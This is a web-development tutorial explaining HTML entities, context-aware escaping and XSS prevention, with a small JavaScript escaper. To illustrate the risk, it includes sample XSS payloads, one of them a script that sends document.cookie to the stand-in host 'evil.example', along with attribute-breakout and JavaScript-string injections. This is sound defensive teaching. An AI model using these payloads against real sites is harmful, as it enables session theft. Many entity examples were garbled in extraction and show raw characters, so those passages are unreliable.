HTML Entities and Escaping: Avoiding Broken Markup and XSS

Most rendering bugs and a large share of web security holes come down to one question: was this text treated as data, or as markup? HTML escaping is how you answer that question consistently, and getting it right is the difference between a clean page and a cross-site scripting (XSS) hole.

What an HTML entity actually is

An HTML entity is a way to represent a character using a sequence of plain ASCII text so the browser doesn't interpret it as part of the markup language. Entities come in two forms:

Named entities like
text
<
,
text
>
,
text
&
, and
text
"
. Each maps to a specific character.
Numeric character references like
text
<
(decimal) or
text
<
(hexadecimal), both of which produce
text
<
.

When the browser's parser encounters

text

&lt;

, it renders a literal less-than sign on the page instead of starting a tag. That single substitution is the entire mechanism behind both correct display and a major class of injection defense.

The characters that matter

The browser decides what is markup and what is text using a small set of special characters. These are the ones you must be able to neutralize:

Character	Why it's dangerous	Entity
text `<`	Opens a tag	text `<`
text `>`	Closes a tag	text `>`
text `&`	Starts an entity reference	text `&`
text `"`	Terminates a double-quoted attribute	text `"`
text `'`	Terminates a single-quoted attribute	text `'` or text `'`

The ampersand is the one people forget. If you escape

text

<

text

&lt;

but leave a raw

text

&

alone, then content like

text

Tom & Jerry &lt;b&gt;

can produce ambiguous or double-decoded output. Always escape

text

&

first, before anything else, so you never re-escape the ampersands you just introduced.

Why you escape: the two failure modes

There are two distinct reasons to escape, and conflating them leads to sloppy fixes.

Broken markup

If a user types a product review that says

text

I rate this 3 < 5 stars

, and you drop that string straight into your HTML, the browser sees

text

<

followed by

text

 5 stars

and tries to parse a tag. The rest of your paragraph may vanish, the layout may collapse, or the page may swallow content until it finds a stray

text

>

. This is a correctness bug, not necessarily a security one, but it is the same root cause.

Cross-site scripting (XSS)

Now imagine the user types this instead:

html
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>

If that lands unescaped in your page, the browser executes it. The attacker's JavaScript now runs in your origin, with access to your users' session cookies, local storage, and the full DOM. Escaping

text

<

text

&lt;

turns that payload into harmless visible text: the browser displays the characters and never runs them.

XSS is not exotic. It is almost always plain text that wasn't escaped before being concatenated into HTML.

Context-aware escaping

The single most important idea in this article: escaping depends on where the data lands. "HTML-escape everything" is a good default but an incomplete rule, because HTML has several sub-languages, each with its own special characters.

HTML text content

Between tags, like

text

<p>HERE</p>

, you need to handle

text

<

text

>

, and

text

&

. This is the most common case and the one most libraries default to.

html
<p>3 &lt; 5 &amp; rising</p>

HTML attributes

Inside an attribute you also have to escape the quote character that delimits the attribute, or the value can break out:

html
<!-- Dangerous: value breaks out of the quotes -->
<input value=""><script>alert(1)</script>">

<!-- Safe: quote is escaped -->
<input value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">

Always quote your attributes. An unquoted attribute can be ended by a space, making it far harder to escape safely.

JavaScript and CSS contexts

HTML entities do not work inside a

text

<script>

block or a

text

style

attribute. If you put user data into JavaScript, the right tool is JSON encoding or JavaScript string escaping, not

text

&lt;

. A frequent mistake:

html
<script>
  // HTML-escaping here does nothing useful and can break the JS
  var name = "USER_INPUT";
</script>

text

USER_INPUT

contains

text

";attackerCode();//

, you have script injection even though there's not a single

text

<

involved. The fix is to serialize the value as JSON (

text

JSON.stringify

) and, ideally, to avoid generating inline script from untrusted data at all.

URLs

A value placed in an

text

href

text

src

needs URL encoding, plus a scheme check. HTML-escaping a URL does nothing to stop

text

javascript:alert(1)

from running when clicked. Validate that the scheme is

text

http

text

https

, or

text

mailto

before trusting it.

The takeaway: pick the escaping function that matches the destination context. The same byte of user input may need three different treatments depending on whether it lands in text, an attribute, a script string, or a URL.

Named vs numeric entities

For the security-critical characters, named and numeric entities are interchangeable in effect:

text
<
and
text
<
and
text
<
all render
text
<
.
text
&
and
text
&
both render
text
&
.

Practical guidance:

Named entities are more readable for the common set (
text
<
,
text
>
,
text
&
,
text
"
). Prefer them in hand-written markup.
Numeric references are universal. Any Unicode code point can be written as
text
&#NNNN;
or
text
&#xHHHH;
, which matters for characters that have no named entity.
text
'
is risky in old contexts. It is valid in HTML5 but was not defined in HTML 4 and historically failed in some XML/email rendering paths. When escaping single quotes defensively,
text
'
is the safer choice.

A defensive escaper that emits numeric references for the dangerous set is a perfectly reasonable design, and it sidesteps the

text

&apos;

compatibility wrinkle entirely.

If you want to inspect exactly what a given snippet decodes to, or convert a block of text to its escaped form, our HTML entity encoder and decoder does the round-trip and runs entirely in your browser, so nothing you paste leaves your device.

Common mistakes

Escaping on input instead of output

A recurring anti-pattern is to escape data the moment it arrives and store the escaped version in the database. This breaks the moment the same data is used in a non-HTML context: an email, a JSON API, a CSV export, or a PDF. You end up with

text

&amp;

showing up in plain-text emails. Store raw, escape at output, where you know the exact destination context.

Double escaping

If you escape a value twice,

text

&

becomes

text

&amp;

becomes

text

&amp;amp;

, and users see literal

text

&amp;

on the page. This usually happens when a template engine auto-escapes and your code also escapes manually. Know whether your framework escapes by default (most modern ones do for interpolated values) and don't stack a second pass on top.

Trusting an allowlist of "safe" characters

Blocklisting

text

<script>

or stripping the word "javascript" is not escaping and does not work. Attackers use

text

<img src=x onerror=...>

, SVG event handlers, mixed-case

text

JaVaScRiPt:

, and dozens of other vectors. Encode the structural characters; don't try to outguess every payload.

Forgetting the attribute quote

Escaping

text

<

and

text

>

but not the quote character leaves attribute-context injection wide open, as shown above. If your data goes in an attribute, the delimiter quote is non-negotiable.

Marking strings as "safe" to silence the framework

Every templating system has an escape hatch (

text

dangerouslySetInnerHTML

text

|safe

text

v-html

text

mark_safe

). Each one disables the auto-escaping that was protecting you. Reserve these for HTML you generated yourself and never for anything derived from user input without sanitization.

A minimal correct escaper

For HTML text and double-quoted attribute contexts, this small function covers the dangerous set in the correct order:

javascript
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')   // must be first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

This is deliberately small. It is correct for text and attribute output, and it is not a substitute for JSON encoding in script contexts or URL encoding in

text

href

values. Real applications should lean on their framework's context-aware auto-escaping rather than hand-rolling this everywhere; the snippet exists to show that the core mechanism is simple and to make the ordering explicit.

Layers beyond escaping

Escaping is the primary defense, but pair it with a couple of cheap reinforcements:

A Content-Security-Policy that disallows inline scripts turns many would-be XSS payloads into nothing, even if an escape slips.
HttpOnly cookies keep session tokens out of reach of any script that does execute.

Neither replaces escaping; both reduce the blast radius when something gets through.

Seeing it in practice

The fastest way to build intuition is to watch escaped and unescaped markup render side by side. Paste a snippet with raw

text

<

and

text

&

into our live HTML preview and then escape it to see how the same string flips from broken or executable to inert, readable text. If you only remember one rule from this article, make it this: decide what context the data lands in, escape for that context at the moment of output, and never trust a string to escape itself.

We use cookies

HTML Entities and Escaping: Avoiding Broken Markup and XSS

What an HTML entity actually is

The characters that matter

Why you escape: the two failure modes

Broken markup

Cross-site scripting (XSS)

Context-aware escaping

HTML text content

HTML attributes

JavaScript and CSS contexts

URLs

Named vs numeric entities

Common mistakes

Escaping on input instead of output

Double escaping

Trusting an allowlist of "safe" characters

Forgetting the attribute quote

Marking strings as "safe" to silence the framework

A minimal correct escaper

Layers beyond escaping

Seeing it in practice

Related guides